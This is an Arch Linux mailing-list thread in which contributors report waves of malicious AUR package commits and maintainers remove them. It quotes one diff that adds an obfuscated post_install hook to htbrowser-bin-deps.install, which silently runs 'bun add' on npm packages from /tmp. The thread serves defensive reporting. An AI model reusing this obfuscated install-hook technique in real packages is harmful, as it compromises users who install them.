Maybe not the right term, malicious but harmless?
https://aur.archlinux.org/cgit/aur.git/commit/?h=gimp-plugin-beautify&id=d7e60421ac68ee82493481a8c601e534947b4abd
https://aur.archlinux.org/cgit/aur.git/commit/?h=voxatron-hib&id=fe6eb19b2e1c8af5d386e375e02aeed3b47eea42
https://aur.archlinux.org/cgit/aur.git/commit/?h=weeplugins-git&id=c425f29b62d051067f25496363283879f9bf75a4

Alright, enough for now, I guess the rest can be easily grepped.
(and I see the force pushes here:
https://github.com/archlinux/aur/activity?activity_type=force_push
thanks progandy!)

On Sun, 14 Jun 2026 at 22:05, Nicolas Boichat <[email protected]> wrote:
>
> Not really malicious per se, but not appropriate either, picked up by
> my detection bot:
> https://aur.archlinux.org/cgit/aur.git/commit/PKGBUILD?h=gtk2%2bextra&id=424199b8cc09ff19fc8043bf0e017d1219c66654
> https://aur.archlinux.org/cgit/aur.git/commit/PKGBUILD?h=openspades&id=efbf69ac253a0658488933f5b6d5d2c8ed543441
> https://aur.archlinux.org/cgit/aur.git/commit/PKGBUILD?h=pg_vectorize&id=f2c0b5c635fd9417af2b961f44188b7d0de31bb7
> https://aur.archlinux.org/cgit/aur.git/commit/PKGBUILD?h=unsf-git&id=6d2cb90d5060973f5a6ce5f29faa1c8ba9e358fd
>
> I assume there are more coming, those 4 for now.
>
> On Sun, 14 Jun 2026 at 11:30, Nicolas Boichat <[email protected]> wrote:
> >
> > Those too -- but I can't see the malicious commits on HEAD so I assume
> > somebody took action already.
> > - 
> > https://aur.archlinux.org/cgit/aur.git/commit/?h=gulden-appimage&id=8188e5841b9d50384b7dde9136d80fbd1415c818
> > - 
> > https://aur.archlinux.org/cgit/aur.git/commit/?h=hack-browser-data-git&id=191ddf65e0337ee9df30d7e643fc13f6cea3f30d
> > - 
> > https://aur.archlinux.org/cgit/aur.git/commit/?h=kcmlaptop&id=ff8e6c657a41059abbd833196b18e852453385e4
> >
> > On Sun, 14 Jun 2026 at 11:21, Nicolas Boichat <[email protected]> wrote:
> > >
> > > There's a new wave (detected using my local Gemma E2B model FWIW).
> > >
> > > It's a little bit more elaborate:
> > > https://aur.archlinux.org/cgit/aur.git/commit/?h=htbrowser-bin&id=462c21877fe6d2f563ed6620ef227e06ac8c51c8
> > >
> > > diff --git a/htbrowser-bin-deps.install b/htbrowser-bin-deps.install
> > > new file mode 100644
> > > index 000000000000..9806501accad
> > > --- /dev/null
> > > +++ b/htbrowser-bin-deps.install
> > > @@ -0,0 +1,3 @@
> > > +post_install() {
> > > + $'\x63'"d" "/"'t'"m"'p' && "b"'u''n' 'a'"d"'d'
> > > $'\141\x6e''s'"i""-"$'\143''o''l''o''r'$'\x73'
> > > 'n'"e"'x'"t""f"'i''l''e''-''j''s'
> > > +}
> > >
> > > On Fri, 12 Jun 2026 at 01:47, Jonathan Grotelüschen
> > > <[email protected]> wrote:
> > > >
> > > > Hi everyone,
> > > >
> > > > we’re working hard to reset/delete all malicious commits and ban the
> > > > accounts.
> > > >
> > > > If you find more malicious packages, please **send them as a reply to
> > > > this email** to keep them all in one thread.
> > > >
> > > > Thanks!
> > > >
> > > > --
> > > > tippfehlr

Reply via email to